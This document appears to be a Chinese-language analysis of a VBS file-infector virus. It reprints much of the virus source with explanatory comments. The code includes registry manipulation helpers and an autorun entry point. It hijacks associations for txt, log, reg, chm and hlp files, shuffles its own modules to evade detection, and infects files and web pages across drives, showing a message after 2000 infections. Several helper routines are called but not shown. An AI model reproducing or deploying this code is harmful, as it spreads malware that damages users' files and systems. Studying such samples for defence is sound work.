按照我得到的样本中的代码顺序,分上、中、下三部分剖析代码:
病毒主要用到的是Wscript.Shell 对象,所以运行的时候任务管理器里都有Wscript.exe程序的进程的... //删除注册表键值函数 引用 Sub DeleteReg(strkey) Dim tmps Set tmps = CreateObject(\"WScript.Shell\") //RegDelete 从注册表中删除指定的键或值 tmps.RegDelete strkey Set tmps = Nothing End Sub //读注册表键值函数 引用 Function ReadReg(strkey) Dim tmps Set tmps = CreateObject(\"WScript.Shell\") //RegRead 从注册表中返回指定的键或值 ReadReg = tmps.RegRead(strkey) Set tmps = Nothing End Function //写注册表键值函数 引用 Sub WriteReg(strkey, Value, vtype) Dim tmps Set tmps = CreateObject(\"WScript.Shell\") If vtype = \"\" Then //RegWrite 在注册表中设置指定的键或值 tmps.RegWrite strkey, Value Else tmps.RegWrite strkey, Value, vtype End If Set tmps = Nothing End Sub //VBS
病毒体程序 引用 Sub ExeVbs_Virus() //除错代码,定义变量 On Error Resume Next Dim objfso, objshell, FullPath_Self, Name_Self, Names Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath Dim Order, Order_Order, Order_Para Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody //创建FSO对象,从而可以对文本文件和文件目录进行访问控制 Set objfso = CreateObject(GetFSOName()) //创建WshShell 对象,从而可以对注册表和进程进行访问控制 Set objshell = CreateObject(\"WScript.Shell\") //获取
病毒体文件路径(WScript.ScriptFullName ’返回当前运行脚本的完整路径) FullPath_Self = WScript.ScriptFullName //获取
病毒体文件名(WScript.ScriptName ’返回当前双击执行的WSF或VBS或JS文件的文件名) Name_Self = WScript.ScriptName //定义模块名称数组,下面用到 Names = Array(\"ATRWZPCAQPMYT\", \"SXHBAKUUEZF\") //获得脚本外界参数 Set oArgs = WScript.Arguments ArgNum = 0 //WScript.Arguments.count ’返回用户所拖放文件至脚本时的拖放文件个数 //WScript.Echo WScript.Arguments(0) ’返回用户所拖放文件第1个单个文件的完整路径和名称 Do While ArgNum < oArgs.Count Para_V = Para_V & \" \" & oArgs(ArgNum) ArgNum = ArgNum 1 Loop //获取参数后缀 SubPara_V = LCase(Right(Para_V, 3)) Select Case SubPara_V //AutoRun启动 Case \"run\" //获取驱动器名称 RunPath = Left(FullPath_Self, 2) //打开驱动器 Call Run(RunPath) // 获得全局变量vbsCode 得到自身
病毒代码 vbsCode = GetSelfCode(objfso, FullPath_Self) //生成
病毒体代码架构 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V //更换
病毒体模块顺序 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) //更换名称 VbsCode_Virus = ChangeName(VbsCode_Virus, Names) //主程序文件检查 Call InvadeSystem(objfso, VbsCode_Virus) //运行程序 Call Run(FullPath_V1) //txt,log关联启动 Case \"txt\", \"log\" //运行相关txt,log文件 RunPath = \"%SystemRoot%\system32\NOTEPAD.EXE \" & Para_V Call Run(RunPath) vbsCode = GetSelfCode(objfso, FullPath_Self) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) //运行
病毒文件 Call Run(FullPath_V1) //reg关联启动 Case \"reg\" //运行相关reg文件 Para_V = \"regedit.exe \" & \"\"\"\" & Trim(Para_V) & \"\"\"\" Call Run(Para_V) vbsCode = GetSelfCode(objfso, FullPath_Self) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) Call Run(FullPath_V1) //chm关联启动 Case \"chm\" //运行相关chm文件 Para_V = \"hh.exe \" & \"\"\"\" & Trim(Para_V) & \"\"\"\" Call Run(Para_V) vbsCode = GetSelfCode(objfso, FullPath_Self) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) Call Run(FullPath_V1) //hlp关联启动 Case \"hlp\" //运行相关hlp文件 Para_V = \"winhlp32.exe \" & \"\"\"\" & Trim(Para_V) & \"\"\"\" Call Run(Para_V) vbsCode = GetSelfCode(objfso, FullPath_Self) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) Call Run(FullPath_V1) //正常启动 Case Else //如果
病毒已在运行就退出 If PreInstance = True Then WScript.Quit End If //如果可以感染 If IsOK(objfso, Date(), FullPath_Config) = False Then //如果配置文件已经存在 If objfso.FileExists(FullPath_Config) = True Then //获取Order名称 Order = Trim(ReadOK(objfso, FullPath_Config)) Order_Order = Trim(Mid(Order, 1, InStr(1, Order, \"@\") -1)) Order_Para = Trim(Mid(Order, InStr(1, Order, \"@\") 1, Len(Order) - InStr(1, Order, \"@\"))) End If Select Case Order_Order //如果命令名称是InfectFiles,则进行感染 Case \"InfectFiles\" vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode) VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names) VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode) VbsCode_Victim = ChangeName(VbsCode_Victim, Names) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0) Order_Para = Order_Para Cnt //超过2000个文件则改操作命令为msg,以及命令内容 If Order_Para>2000 Then Call WriteOK(objfso, FullPath_Config, \"Msg\", \"您已有超过2000个文件被感染!不过请放心,此
病毒很容易被清除!请联系418465***-_- !\") Else Call WriteOK(objfso, FullPath_Config, \"InfectFiles\", Order_Para) End If Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) //如果命令名称是msg,则弹出提示 Case \"Msg\" MsgBox Order_Para Call WriteOK(objfso, FullPath_Config, \"\", \"\") vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) //如果命令名称是UnLoadMe,则自我清楚恢复系统 Case \"UnLoadMe\" Call RestoreSystem(objfso) Wscript.Quit //如果命令名称是KillVirus,则自我清楚恢复系统并且恢复被感染的文件 Case \"KillVirus\" Call RestoreSystem(objfso) Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1) Wscript.Quit //如果是其他,则传播 Case Else vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode) VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names) VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode) VbsCode_Victim = ChangeName(VbsCode_Victim, Names) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0) Call WriteOK(objfso, FullPath_Config, \"InfectFiles\", Cnt) Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) End Select Else vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & 
MainBody & VBCRLF & Tail_V ’生成
病毒体完整代码 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) ’改变模块组合顺序 VbsCode_Virus = ChangeName(VbsCode_Virus, Names) ’改变模块标志名称 Call MonitorSystem(objfso, VbsCode_Virus) End If End Select Set objfso = Nothing Set objshell = Nothing End Sub //
病毒开始,排错并定义 引用 On Error Resume Next Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V Dim ModelHead, ModelTail Cnt = 0 //感染文件的最大数目 CntMax = 1000 //版本号 Version = \"4\" //定义
病毒文件名称 Name_V1 = GetUserName() & \".vbs\" FullPath_V0 = GetSFolder(0) & Name_V1 ’主要执行文件关联转向 FullPath_V1 = GetSFolder(1) & Name_V1 ’主要执行配置文件命令 //定义配置文件名称 FullPath_Config= GetSFolder(1) & GetUserName() & \".ini\" Sum_ModelCode = 26 Head_V= GetHeadTail(0) Tail_V= GetHeadTail(1) //定义模块头部与尾部名称 ModelHead=\"’ATRWZPCAQPMYT\" ModelTail=\"’SXHBAKUUEZF\"